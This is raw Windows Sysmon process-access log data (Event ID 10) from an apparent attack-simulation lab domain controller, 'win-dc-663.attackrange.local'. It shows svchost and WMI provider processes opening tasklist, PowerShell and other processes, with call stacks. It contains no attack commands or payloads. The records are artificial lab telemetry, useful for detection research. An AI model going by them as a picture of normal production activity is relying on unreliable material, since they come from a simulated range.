21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-A273-60D3-3D05-00000000CF01}5832C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-A269-60D3-0B05-00000000CF01}4844C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025912Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025911Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9F32-60D3-D100-00000000CF01}100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 